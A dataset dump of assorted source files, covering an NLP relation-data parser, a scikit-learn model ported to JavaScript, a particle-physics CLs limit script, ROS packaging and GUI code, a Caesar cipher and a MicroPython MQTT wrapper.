index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
19,200 | 3282c379876db50db99d6129fc0e660c6e7246b9 | import os , sys
import numpy as np
import pdb
import random
import fitlog
from .base import *
#fitlog.commit(__file__)
def parse_a_text_file(logger , cont , dirty = False):
    '''Parse one SemEval-style text file into a {text_id: Data} dict.

    cont   -- raw file content: a <doc> wrapper holding <text id="..."> blocks,
              each with a <title> and an <abstract>, where entity mentions are
              tagged as <entity id="...">name</entity>.
    dirty  -- True for noisy data: malformed samples are silently dropped;
              False for clean data: any parse failure opens the pdb debugger.

    Returns a dict mapping text_id -> Data(text_id, title, abstract, ents),
    where all entity tags have been stripped and each entity is recorded as an
    Entity carrying character offsets into the cleaned abstract string.
    '''
    cont = cont.split("<doc>")[1].split("</doc>")[0] # drop everything before <doc> and after </doc>
    cont = filter(lambda x : x , cont.strip().split("</text>"))
    datas = {}
    for x in cont:
        try:
            x = x.strip().replace("\n" , " ").replace("\t" , " ")
            x = x[10:] #remove <text id=\"
            assert '"' in x, "the quote sign is not in text string"
            text_id, x = x.split('"', 1)
            x = '"' + x
            #text_id , x = x[:8] , x[8:] #text id must look like XXX-XXXX
            x = x.split("<title>")[1].strip() #remove <title>
            title , x = x.split("</title>")
            while "</entity>" in title: #strip entity tags that occur inside the title
                title = title.split("<entity id=\"" , 1)[0] + " " + title.split("\">" , 1)[1]
                title = title.replace("</entity>" , "" , 1)
            title = " ".join(list(filter(lambda x : x , title.strip().split(" ")))) # collapse repeated spaces
            x = x.split("<abstract>")[1].strip().split("</abstract>")[0].strip() #remove <abstract> , <\abstract>
            ents = []
            while "</entity>" in x:
                # peel off one entity tag at a time, recording its character
                # span inside the progressively de-tagged abstract string
                ent_id = x.split("<entity id=\"" , 1)[1].split("\">" , 1)[0]
                ent_head = "<entity id=\"%s\">" % ent_id
                ent_start = x.find(ent_head)
                x = x.replace(ent_head , "" , 1)
                ent_end = x.find("</entity>")
                x = x.replace("</entity>" , "" , 1)
                while x[ent_start] == " ": # entity name has leading spaces
                    ent_start += 1
                while x[ent_end-1] == " ": # entity name has trailing spaces
                    ent_end -= 1
                if not (ent_start == 0 or x[ent_start-1] == " "): # entity glued to the preceding token: insert a space
                    x = x[ : ent_start] + " " + x[ent_start : ]
                    ent_start += 1
                    ent_end += 1
                if not (ent_end == len(x) or x[ent_end] == " "): # entity glued to the following token: insert a space
                    x = x[ : ent_end] + " " + x[ent_end : ]
                assert ent_start >= 0 and ent_end >= 0
                ents.append(Entity(ent_start , ent_end , name = ent_id))
            assert x.find("<entity") < 0 and x.find("</entity>") < 0
            assert len(ents) > 0
            # sanity-check every entity span: it must start and end on word
            # boundaries (assumes Entity stores the span as .s / .e -- TODO
            # confirm against the Entity definition in .base)
            rem_ent = []
            for e in ents:
                try:
                    assert (e.s == 0 or x[e.s-1] == " ") and x[e.s] != " "
                    assert (e.e == len(x) or x[e.e] == " ") and x[e.e-1] != " "
                except AssertionError:
                    rem_ent.append(e)
                except IndexError:
                    if dirty:
                        assert False # drop the whole sample (caught by the outer except)
                    rem_ent.append(e)
            if len(rem_ent) > 0:
                if dirty:
                    assert False # drop the whole sample (caught by the outer except)
                # NOTE(review): 'e' here is the last entity of the loop above,
                # not necessarily one of the offending ones
                logger.log ("Bad entity showed. in %s" % e.name)
                for e in rem_ent:
                    #drop that
                    ents.remove(e)
            abstract = x
            datas[text_id] = Data(
                text_id = text_id ,
                title = title ,
                abstract = abstract ,
                ents = ents ,
            )
        except Exception:
            # if error occured , give up this data sample.
            if not dirty: #but not for clean data
                pdb.set_trace()
    return datas
def parse_a_key_file(logger , datas , cont , dtype = "test"):
    """Parse a relation ("key") file and attach relations to their samples.

    Each line looks like ``REL(doc.ent1,doc.ent2)`` or, with swapped argument
    order, ``REL(doc.ent2,doc.ent1,REVERSE)``.  A parsed Relation is appended
    to ``datas[text_id].ans``; for training data a COMPARE relation is also
    added in the mirrored direction.  Lines whose sample or entities were
    dropped during text parsing are skipped.

    Returns the (mutated) datas dict and the list of relation names seen.
    """
    relations = []
    for line in cont.strip().split("\n"):
        rel , rest = line.strip().split("(")
        rest = rest.split(")")[0]  # discard the trailing ")" and anything after
        fields = rest.split(",")
        if len(fields) == 3:
            # the third field flags reversed argument order
            assert fields[2] == "REVERSE"
            ent_b , ent_a = fields[:2]
        else:
            ent_a , ent_b = fields[:2]
        text_id = ent_a.split(".")[0]
        try:
            # both entities must come from the same document
            assert ent_b.split(".")[0] == text_id
        except AssertionError:
            pdb.set_trace()
        if datas.get(text_id) is None:
            continue  # sample was dropped during text parsing
        sample = datas[text_id]
        if ent_a not in sample.ent_names or ent_b not in sample.ent_names:
            continue  # entity was dropped (e.g. it only occurred in the title)
        sample.ans.append(Relation(ent_a , ent_b , rel))
        if dtype == "train" and rel == "COMPARE":
            # COMPARE is symmetric: add the mirrored pair for training
            sample.ans.append(Relation(ent_b , ent_a , rel))
        relations.append(rel)
    return datas, relations
def file_content2data(
    C , logger ,
    train_text_1 , train_rels_1 ,
    train_text_2 , train_rels_2 ,
    test_text , test_rels ,
    valid_text , valid_rels ,
    dataset_type , rel_weight_smooth , rel_weight_norm , verbose = True
):
    """Turn raw file contents into processed train/test/valid datasets.

    Parses each (text, relations) content pair, merges the two training
    splits (the second one is treated as noisy / "dirty"), flattens the
    per-split dicts into sample lists, and hands everything to data_process.
    """
    def _load(text_cont, rels_cont, dirty, dtype):
        # parse one (text file, key file) pair into (dict of samples, rel names)
        parsed = parse_a_text_file(logger, text_cont, dirty=dirty)
        return parse_a_key_file(logger, parsed, rels_cont, dtype=dtype)

    train_data , rels_a = _load(train_text_1, train_rels_1, False, "train")
    extra_train, rels_b = _load(train_text_2, train_rels_2, True , "train")
    train_data.update(extra_train)  # merge the noisy split into the clean one
    test_data  , rels_c = _load(test_text , test_rels , False, "test")
    valid_data , rels_d = _load(valid_text, valid_rels, False, "test")
    rel_list = rels_a + rels_b + rels_c + rels_d

    # dict of samples -> plain list of samples
    train_data = list(train_data.values())
    test_data  = list(test_data.values())
    valid_data = list(valid_data.values())

    return data_process(
        C , logger ,
        train_data , test_data , valid_data , rel_list ,
        dataset_type , rel_weight_smooth , rel_weight_norm , verbose ,
    )
def read_data(
    C , logger ,
    file_train_text_1 , file_train_rels_1 ,
    file_train_text_2 , file_train_rels_2 ,
    file_test_text , file_test_rels ,
    file_valid_text , file_valid_rels ,
    dataset_type , rel_weight_smooth , rel_weight_norm ,
):
    """Read the eight dataset files from disk and build processed datasets.

    Thin wrapper: loads each file's content in order and delegates all
    parsing/processing to file_content2data.
    """
    # order matters: it mirrors file_content2data's positional parameters
    contents = [
        get_file_content(path)
        for path in (
            file_train_text_1 , file_train_rels_1 ,
            file_train_text_2 , file_train_rels_2 ,
            file_test_text , file_test_rels ,
            file_valid_text , file_valid_rels ,
        )
    ]
    return file_content2data(
        C , logger ,
        *contents ,
        dataset_type , rel_weight_smooth , rel_weight_norm ,
    )
if __name__ == "__main__":
from config import C
read_data(C.train_text , C.train_rels , C.test_text , C.test_rels) |
19,201 | 42fbc0e990ca6d4741d64f778eec9856a69f7add | # -*- coding: utf-8 -*-
from sklearn.datasets import load_iris
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn_porter import Porter

# Demo: train an AdaBoost ensemble of shallow decision trees on the Iris
# dataset, then transpile the fitted model to JavaScript via sklearn-porter.
iris_data = load_iris()
X, y = iris_data.data, iris_data.target
# NOTE(review): `base_estimator` was renamed to `estimator` in scikit-learn 1.2
# and removed in 1.4 -- confirm the pinned scikit-learn version still accepts it.
base_estimator = DecisionTreeClassifier(max_depth=4, random_state=0)
clf = AdaBoostClassifier(base_estimator=base_estimator, n_estimators=100,
                         random_state=0)
clf.fit(X, y)
# Cheese!
result = Porter(language='js').port(clf)
print(result)
"""
var Tmp = function(atts) {
var predict_0 = function(atts) {
var classes = new Array(3);
if (atts[3] <= 0.80000001192092896) {
classes[0] = 0.33333333333333298;
classes[1] = 0.0;
classes[2] = 0.0;
} else {
if (atts[3] <= 1.75) {
if (atts[2] <= 4.9499998092651367) {
if (atts[3] <= 1.6500000953674316) {
classes[0] = 0.0;
classes[1] = 0.31333333333333302;
classes[2] = 0.0;
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.0066666666666666671;
}
} else {
if (atts[3] <= 1.5499999523162842) {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.02;
} else {
classes[0] = 0.0;
classes[1] = 0.013333333333333334;
classes[2] = 0.0066666666666666671;
}
}
} else {
if (atts[2] <= 4.8500003814697266) {
if (atts[0] <= 5.9499998092651367) {
classes[0] = 0.0;
classes[1] = 0.0066666666666666671;
classes[2] = 0.0;
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.013333333333333334;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.2866666666666664;
}
}
}
return classes;
};
var predict_1 = function(atts) {
var classes = new Array(3);
if (atts[2] <= 5.1499996185302734) {
if (atts[2] <= 2.4500000476837158) {
classes[0] = 8.3290724464028397e-05;
classes[1] = 0.0;
classes[2] = 0.0;
} else {
if (atts[3] <= 1.75) {
if (atts[0] <= 4.9499998092651367) {
classes[0] = 0.0;
classes[1] = 1.6658144892805682e-06;
classes[2] = 1.6658144892805682e-06;
} else {
classes[0] = 0.0;
classes[1] = 0.4999541901015449;
classes[2] = 3.3316289785611363e-06;
}
} else {
if (atts[1] <= 3.1500000953674316) {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 1.9989773871366814e-05;
} else {
classes[0] = 0.0;
classes[1] = 1.6658144892805682e-06;
classes[2] = 1.6658144892805682e-06;
}
}
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.4999325345131842;
}
return classes;
};
var predict_2 = function(atts) {
var classes = new Array(3);
if (atts[3] <= 1.5499999523162842) {
if (atts[2] <= 4.9499998092651367) {
if (atts[3] <= 0.80000001192092896) {
classes[0] = 2.6788177186451792e-08;
classes[1] = 0.0;
classes[2] = 0.0;
} else {
classes[0] = 0.0;
classes[1] = 0.00018473109499329488;
classes[2] = 0.0;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.49969664310232625;
}
} else {
if (atts[2] <= 5.1499996185302734) {
if (atts[3] <= 1.8499999046325684) {
if (atts[0] <= 5.4000000953674316) {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.00011147301524887026;
} else {
classes[0] = 0.0;
classes[1] = 0.49973485750206614;
classes[2] = 2.6788177186451756e-09;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.00011147676559367639;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.00016078905277695348;
}
}
return classes;
};
var predict_3 = function(atts) {
var classes = new Array(3);
if (atts[3] <= 1.75) {
if (atts[3] <= 1.5499999523162842) {
if (atts[2] <= 4.9499998092651367) {
if (atts[3] <= 0.80000001192092896) {
classes[0] = 9.2576539737627342e-11;
classes[1] = 0.0;
classes[2] = 0.0;
} else {
classes[0] = 0.0;
classes[1] = 6.384072136521275e-07;
classes[2] = 0.0;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.0017268881646907192;
}
} else {
if (atts[0] <= 6.9499998092651367) {
if (atts[1] <= 2.5999999046325684) {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 3.8523658978481932e-07;
} else {
classes[0] = 0.0;
classes[1] = 0.49902423425502029;
classes[2] = 0.0;
}
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 5.5560730608384753e-07;
}
}
} else {
if (atts[1] <= 3.1500000953674316) {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 0.49913557364140265;
} else {
if (atts[2] <= 4.9499998092651367) {
classes[0] = 0.0;
classes[1] = 0.00011133933639195673;
classes[2] = 0.0;
} else {
classes[0] = 0.0;
classes[1] = 0.0;
classes[2] = 3.8525880815435657e-07;
}
}
}
return classes;
};
this.predict = function(atts) {
var n_estimators = 4,
preds = new Array(n_estimators),
n_classes = 3,
classes = new Array(n_classes),
normalizer, sum, idx, val,
i, j;
preds[0] = predict_0(atts);
preds[1] = predict_1(atts);
preds[2] = predict_2(atts);
preds[3] = predict_3(atts);
for (i = 0; i < n_estimators; i++) {
normalizer = 0.;
for (j = 0; j < n_classes; j++) {
normalizer += preds[i][j];
}
if (normalizer == 0.) {
normalizer = 1.0;
}
for (j = 0; j < n_classes; j++) {
preds[i][j] = preds[i][j] / normalizer;
if (preds[i][j] < 2.2250738585072014e-308) {
preds[i][j] = 2.2250738585072014e-308;
}
preds[i][j] = Math.log(preds[i][j]);
}
sum = 0.0;
for (j = 0; j < n_classes; j++) {
sum += preds[i][j];
}
for (j = 0; j < n_classes; j++) {
preds[i][j] = (n_classes - 1) * (preds[i][j] - (1. / n_classes) * sum);
}
}
for (i = 0; i < n_classes; i++) {
classes[i] = 0.0;
}
for (i = 0; i < n_estimators; i++) {
for (j = 0; j < n_classes; j++) {
classes[j] += preds[i][j];
}
}
idx = -1;
val = Number.NEGATIVE_INFINITY;
for (i = 0; i < n_classes; i++) {
if (classes[i] > val) {
idx = i;
val = classes[i];
}
}
return idx;
};
};
if (typeof process !== 'undefined' && typeof process.argv !== 'undefined') {
if (process.argv.length - 2 == 4) {
var argv = process.argv.slice(2);
var prediction = new Tmp().predict(argv);
console.log(prediction);
}
}
"""
|
19,202 | 48e9d1f8adab34255e7ae5a18bea78c364f6df25 | #!/usr/bin/env python
import os
import ROOT
import matplotlib.pyplot as plt
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
plt.locator_params(axis='y', nticks=10)
from scipy import interpolate
import numpy as np
class ToyReader:
    """Reads toy-experiment and observed NLL trees (ROOT files) for a given
    resonance mass, computes CLs per POI value, and plots/interpolates the
    resulting CLs curve to estimate the 95% CL upper limit (CLs = 0.05).

    Python 2 code (print statements); requires PyROOT, matplotlib, scipy.
    """

    def __init__(self, mass, toy_dir, data_input, poi_list):
        # toy_dir:    directory holding the toy output ROOT files
        # data_input: ROOT file with the observed test statistics
        # poi_list:   numeric POI (signal strength) scan values
        self.toy_dir = toy_dir
        self.data_input = data_input
        self.poi_name = "mu_ggF"
        self.poi_vals = poi_list
        # string keys with two decimals, used to match tree entries and file names
        self.poi_list = ["{:.2f}".format(x) for x in poi_list]
        self.pattern = "toys_mH{}_{}".format(mass, self.poi_name)
        self.mass = mass
        self.read_data()

    def toy_output_pattern(self, _str):
        # Override the default toy file-name pattern.
        self.pattern = _str

    def get_p0(self, nll_list, nll):
        # Fraction of toy test statistics strictly larger than the observed one.
        # NOTE(review): raises ZeroDivisionError when nll_list is empty.
        total = len(nll_list)
        larger = len([x for x in nll_list if x > nll])
        return larger*1.0/total

    def get_cls(self, nll_sb, nll_bonly, nll):
        # CLs = CLsb / CLb.
        # NOTE(review): raises ZeroDivisionError when no background-only toy
        # exceeds the observed nll (CLb == 0) -- confirm this cannot happen
        # for the chosen scan points.
        clsb = self.get_p0(nll_sb, nll)
        clb = self.get_p0(nll_bonly,nll)
        return clsb/clb

    def read_data(self):
        # Fill self.obs_nll_dic: {poi string -> observed test statistic}.
        f_data = ROOT.TFile.Open(self.data_input)
        tree = f_data.Get("physics")
        self.obs_nll_dic = {}
        entries = tree.GetEntries()
        if entries != len(self.poi_list):
            print "entries in observed does not match the one in poi list"
            print entries, len(self.poi_list)
            print "--------------------------"
            # too few observed entries: leave obs_nll_dic partially empty
            if entries < len(self.poi_list):
                return
        for ientry in range(entries):
            tree.GetEntry(ientry)
            # test statistic q = 2 * (NLL_fixed - NLL_free)
            nll = 2 * (tree.nll_SB_fixed - tree.nll_SB_free)
            self.obs_nll_dic["{:.2f}".format(tree.mu)] = nll
        f_data.Close()
        self.obs_nll_dic  # NOTE(review): no-op expression statement

    def read_toys(self, poi):
        # Collect S+B and B-only toy test statistics for one POI value.
        chain = ROOT.TChain("physics", "physics")
        chain.Add(os.path.join(self.toy_dir, self.pattern+poi+"_seed*root"))
        nentries = chain.GetEntries()
        print "total entries for: ",poi,nentries
        nll_sb = []
        nll_bonly = []
        for ientry in range(nentries):
            chain.GetEntry(ientry)
            nll_sb.append(2*(chain.nll_SB_fixed - chain.nll_SB_free))
            nll_bonly.append(2*(chain.nll_B_fixed - chain.nll_SB_free))
        return nll_sb, nll_bonly

    def process(self):
        # Compute CLs per POI, plot toy distributions, interpolate the CLs
        # curve, and print the POI value where CLs is closest to 0.05.
        cls_list = []
        for poi in self.poi_list:
            nll_sb, nll_bonly = self.read_toys(poi)
            obs_nll = self.obs_nll_dic[poi]
            cls = self.get_cls(nll_sb, nll_bonly, obs_nll)
            cls_list.append(cls)
            #bins, edges = np.histogram(nll_sb, 20)
            #plt.plot(edges, bins, 'o')
            nbins = 30
            plt.hist(nll_sb, bins=nbins, range=(-5, 35))
            plt.hist(nll_bonly, bins=nbins, histtype='step', range=(-5, 35))
            # vertical red line marks the observed test statistic
            plt.plot([obs_nll, obs_nll], plt.ylim(), 'r-', lw=2)
            plt.savefig('mH_{}_nll_{}.png'.format(self.mass, poi))
            plt.close()
        for x,y in zip(self.poi_vals, cls_list):
            print x,y
        # smooth the scan with a quadratic interpolation on a fine POI grid
        f = interpolate.interp1d(self.poi_vals, cls_list, 'quadratic', bounds_error=False)
        new_poi = np.arange(self.poi_vals[0]-0.1, self.poi_vals[-1]+0.1, 0.005)
        new_cls = f(new_poi)
        # find the poi that yields the cls that is close to 0.05
        limit = 0.
        min_dis = 999
        for x, y in zip(new_poi, new_cls):
            if abs(y - 0.05) < min_dis:
                min_dis = abs(y - 0.05)
                limit = x
        print "limits:", limit
        plt.plot(self.poi_vals, cls_list, 'o', new_poi, new_cls, '-')
        plt.xlabel('mu')
        plt.ylabel('CLs')
        plt.savefig('mH_{}_cls_test.png'.format(self.mass))
        plt.close()
if __name__ == "__main__":
    # Mass hypothesis -> POI scan values to evaluate.
    mass_dic = {
        # 1600: [6.5, 7.5, 8.5],
        # 1800: [15.0, 17.0, 19.0],
        2000: [38, 42, 46]
    }
    # NOTE(review): dict.iteritems() is Python 2 only -- consistent with the
    # print statements above; this script cannot run under Python 3 as-is.
    for mass, poi_list in mass_dic.iteritems():
        reader = ToyReader(mass, "data", 'observed_q_{}.root'.format(mass), poi_list)
        reader.process()
|
19,203 | 4b0689764e7dcc6c5dd1c6ef35d8ede579ef19fb | import glob
import os.path
from setuptools import setup
from setuptools import find_packages
package_name = 'wolfgang_robocup_api'
setup(
    name=package_name,
    packages=find_packages(),
    # Files installed into the share/ tree so ROS 2 (ament) can locate them.
    data_files=[
        # Register the package in the ament resource index.
        ('share/ament_index/resource_index/packages',
            ['resource/' + package_name]),
        # Standard package manifest.
        (os.path.join('share', package_name), ['package.xml']),
        (os.path.join('share', package_name, 'config'), ['config/devices.json']),
        # Install every launch file found under launch/.
        (os.path.join('share', package_name, 'launch'), glob.glob('launch/*.launch')),
    ],
    install_requires=[
        'launch',
        'setuptools',
    ],
    zip_safe=True,
    keywords=['ROS'],
    license='MIT',
    # Executable exposed via `ros2 run wolfgang_robocup_api command_proxy`.
    entry_points={
        'console_scripts': [
            f'command_proxy = {package_name}.command_proxy:main',
        ],
    },
)
|
19,204 | 62e333eb157a5ca0689bc3e5b186b10338dcdcf3 | import string
# Caesar cipher demo: shift every lowercase letter 3 positions forward;
# uppercase letters, digits and punctuation pass through unchanged.
my_text = input('enter something: ')
shift = 3  # classic Caesar shift
alphabet = string.ascii_lowercase
# Rotated alphabet: 'abc...xyz' -> 'def...xyzabc'
shifted = alphabet[shift:] + alphabet[:shift]
# One-pass character mapping table (plain char -> shifted char).
table = str.maketrans(alphabet, shifted)
# Fixed: call translate on the string instance instead of the unbound
# str.translate(my_text, table) form; also fixed the variable-name typo.
after_translation = my_text.translate(table)
print(after_translation)
|
19,205 | b805301a101aabb52d616dfe2d6a9ca3a8a57510 | # Software License Agreement
__version__ = "0.0.1"
__status__ = "Production"
__license__ = "BSD"
__copyright__ = "Copyright (c) 2015, P.A.N.D.O.R.A. Team. All rights reserved."
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of P.A.N.D.O.R.A. Team nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
__author__ = "Chamzas Konstantinos"
__maintainer__ = "Chamzas Konstantinos"
__email__ = "chamzask@gmail.com"
import os
import rospkg
from python_qt_binding import loadUi
from python_qt_binding.QtCore import Slot, QTimer
from python_qt_binding.QtGui import QWidget
from pandora_sensor_msgs.msg import BatteryMsg
from .widget_info import WidgetInfo
battery_topic = "sensors/battery"
class BatteryWidget(QWidget):
    """
    rqt widget showing the robot's two battery voltages (LCDs + bars).

    BatteryWidget.start must be called in order to update topic pane.
    """

    def __init__(self, plugin=None):
        super(BatteryWidget, self).__init__()
        # Load the Qt .ui layout and name the widget
        self.id_ = "Battery"
        rp = rospkg.RosPack()
        ui_file = os.path.join(
            rp.get_path('pandora_rqt_gui'),
            'resources', 'BatteryWidget.ui')
        loadUi(ui_file, self)
        # Create the subscriber wrapper for the battery topic
        self.widget_info_batteries = WidgetInfo(battery_topic, BatteryMsg)
        # Create and connect the refresh timer (started in start())
        self.timer_refresh_widget = QTimer(self)
        self.timer_refresh_widget.timeout.connect(self.refresh_topics)

    def start(self):
        # Begin monitoring the topic and refresh the pane every 100 ms.
        self.widget_info_batteries.start_monitoring()
        self.timer_refresh_widget.start(100)

    # Slot connected to the timer in order to refresh the displayed values
    @Slot()
    def refresh_topics(self):
        if self.widget_info_batteries.last_message is not None:
            # voltage[0]: PSU battery, voltage[1]: motor battery
            self.lcd1.display(
                self.widget_info_batteries.last_message.voltage[0])
            self.lcd2.display(
                self.widget_info_batteries.last_message.voltage[1])
            # (v - 19) * 20 maps the voltage onto a 0-100 bar value, which
            # presumably assumes a 19 V - 24 V operating range -- TODO confirm
            self.PSUBatteryBar.setValue(
                (self.widget_info_batteries.last_message.voltage[0] - 19) * 20)
            self.MotorBatteryBar.setValue(
                (self.widget_info_batteries.last_message.voltage[1] - 19) * 20)

    # Method called when the widget is terminated
    def shutdown(self):
        self.widget_info_batteries.stop_monitoring()
        self.timer_refresh_widget.stop()
|
19,206 | a7d20d722a9fc6585996e86ac584b54fb269293e | ################################################################################
# filename: user_mqtt.py
# date: 07. Oct. 2020
# username: winkste
# name: Stephan Wink
# description: This module controls the MQTT client and the subscriptions to it
#
################################################################################
################################################################################
# Imports
from umqtt.simple import MQTTClient
from umqtt.simple import MQTTException
from time import sleep
from src.mqtt.user_subs import UserSubs
from src.mqtt.user_subs import set_mqtt_subscribe_cb
from src.mqtt.user_pubs import UserPubs
from src.mqtt.user_pubs import set_mqtt_publish_cb
################################################################################
# Variables
# client object singleton
client = None
################################################################################
# Functions
################################################################################
# @brief Initializes the mqtt client and connects to the mqtt broker
# @param id client id
# @param ip broker ip address
# @param port broker ip port
# @param user broker user identifier
# @param pwd broker user password
# @return none
################################################################################
def start_mqtt_client(id, ip, port, user, pwd):
    """Create the module-level MQTT client singleton and connect to the broker.

    On success the user_subs/user_pubs modules are wired to this module's
    subscribe()/publish() functions.  Failures are printed, never raised.
    """
    global client
    print(id, ip, port, user, pwd)
    client = UserMqtt(id, ip, port, user, pwd)
    try:
        client.set_callback(subs_callback)
        client.connect()
        set_mqtt_subscribe_cb(subscribe)
        set_mqtt_publish_cb(publish)
    except AttributeError:
        print('mqtt client allocation failed...')
    except MQTTException:
        print('mqtt connection error...')
################################################################################
# @brief Stops the mqtt client and disconnects from the mqtt broker
# @return none
################################################################################
def stop_mqtt_client():
    """Disconnect the module-level MQTT client and release the singleton.

    Failures are printed, never raised.
    """
    global client
    try:
        client.disconnect()
        # NOTE(review): if disconnect() raises, client is NOT reset to None
        client = None
    except AttributeError:
        print('mqtt client allocation failed...')
    except MQTTException:
        print('mqtt connection error...')
################################################################################
# @brief using the mqtt client singleton, this function publishes a messsage
# @param topic topic identifier of the messsage
# @param payload payload of the message
# @return none
################################################################################
def publish(topic, payload):
    """Publish *payload* under *topic* through the module-level MQTT client.

    Both arguments are UTF-8 encoded before being handed to the client;
    broker or allocation problems are printed instead of raised.
    """
    global client
    # Encoding happens before the try-block, so a non-string argument fails
    # loudly rather than being mistaken for a missing client.
    encoded_topic = topic.encode('utf-8')
    encoded_payload = payload.encode('utf-8')
    try:
        client.publish(encoded_topic, encoded_payload)
    except AttributeError:
        print('mqtt client not allocated...')
    except OSError:
        print('mqtt connection error in publish...')
################################################################################
# @brief Callback function for incoming subscriptions
# @param topic topic identifier of the messsage
# @param payload payload of the message
# @return none
################################################################################
def subs_callback(topic, data):
    """Raw-message callback: decode bytes and dispatch to subscriptions.

    topic/data arrive as bytes from umqtt; they are decoded as UTF-8 before
    being matched against the registered subscriptions.
    """
    print('Topic received:', topic)
    print('Data received:', data)
    topic_string = topic.decode('utf-8')
    data_string = data.decode('utf-8')
    # NOTE(review): unlike publish/subscribe, a missing client is not guarded here
    client.check_subscriptions(topic_string, data_string)
################################################################################
# @brief This function subscribes for a topic and registers a callback
# function to be called when the topic arrives
# @param topic topic identifier of the messsage
# @param cb_func callback function when topic arrives
# @return none
################################################################################
def subscribe(user_subs):
    """Register a UserSubs object (topic + callback) with the client singleton.

    Failures are printed, never raised.
    """
    global client
    try:
        client.subscribe(user_subs)
    except AttributeError:
        print('mqtt client not allocated...')
    except OSError:
        print('mqtt connection error in subscribe...')
################################################################################
# @brief This function prints all registered subsciptions
# @return none
################################################################################
def print_all_subscriptions():
    """Print the topic of every registered subscription.

    NOTE(review): unguarded -- raises AttributeError when the client was
    never started.
    """
    global client
    client.print_all_subscriptions()
################################################################################
# @brief This function checks non blocking for an MQTT incoming message
# and processes it
# @return none
################################################################################
def check_non_blocking_for_msg():
    """Poll the broker once, without blocking, for a pending message.

    Returns True when the poll ran cleanly, False when the client is missing
    or the connection failed (the error is printed, never raised).
    """
    global client
    succeeded = False
    try:
        client.check_non_blocking_for_msg()
        succeeded = True
    except AttributeError:
        print('mqtt client not allocated...')
    except OSError:
        print('mqtt connection error in check_non_blocking_for_msg...')
    return succeeded
################################################################################
# Classes
################################################################################
# @brief This class handles the mqtt connection and organizes all
# registered subscriptions
################################################################################
class UserMqtt:
    """Wrapper around umqtt's MQTTClient that tracks the registered
    subscriptions of one connection and dispatches incoming messages to
    their callbacks.
    """

    def __init__(self, client_id, broker_ip, broker_port, user_account,
                 user_pwd):
        """Configure (but do not yet connect) the underlying MQTT client.

        client_id   -- client identifier presented to the broker
        broker_ip   -- broker ip address
        broker_port -- broker ip port
        user_account-- broker user identifier
        user_pwd    -- broker user password
        """
        self.client_id = client_id
        self.broker_ip = broker_ip
        self.broker_port = broker_port
        self.broker_user = user_account
        self.broker_pwd = user_pwd
        # BUG FIX: these used to be mutable CLASS attributes, so every
        # UserMqtt instance shared one and the same 'subscriptions' list.
        # All state is now per-instance.
        self.subscriptions = []
        self.subs_cb = None
        self.mqtt_client = MQTTClient(self.client_id, self.broker_ip,
                                      self.broker_port, self.broker_user,
                                      self.broker_pwd)

    def connect(self):
        """Connect the configured client to the MQTT broker."""
        self.mqtt_client.connect()

    def disconnect(self):
        """Disconnect the configured client from the MQTT broker."""
        self.mqtt_client.disconnect()

    def set_callback(self, subs_cb):
        """Install *subs_cb* as the raw incoming-message callback."""
        self.subs_cb = subs_cb
        self.mqtt_client.set_callback(self.subs_cb)

    def publish(self, topic, payload):
        """Publish *payload* under *topic* on the broker."""
        self.mqtt_client.publish(topic, payload)

    def subscribe(self, user_subs):
        """Register *user_subs* (UserSubs: .topic + callback) and subscribe
        to its topic on the broker."""
        self.subscriptions.append(user_subs)
        self.mqtt_client.subscribe(user_subs.topic)

    def check_subscriptions(self, topic, payload):
        """Dispatch an incoming message to every registered subscription
        whose topic matches exactly."""
        for obj in self.subscriptions:
            if topic == obj.topic:
                obj.callback_on_arrived_topic(topic, payload)

    def print_all_subscriptions(self):
        """Print the topic of every registered subscription."""
        for obj in self.subscriptions:
            print(obj.topic)

    def check_non_blocking_for_msg(self):
        """Process at most one pending incoming message without blocking."""
        self.mqtt_client.check_msg()
################################################################################
# Scripts
if __name__ == "__main__":
print("--- user_mqtt test script ---")
|
19,207 | 27367966824683746fcfa6f5e5337ba250f7c9ac | # -*- coding: utf-8 -*-
import tensorflow as tf
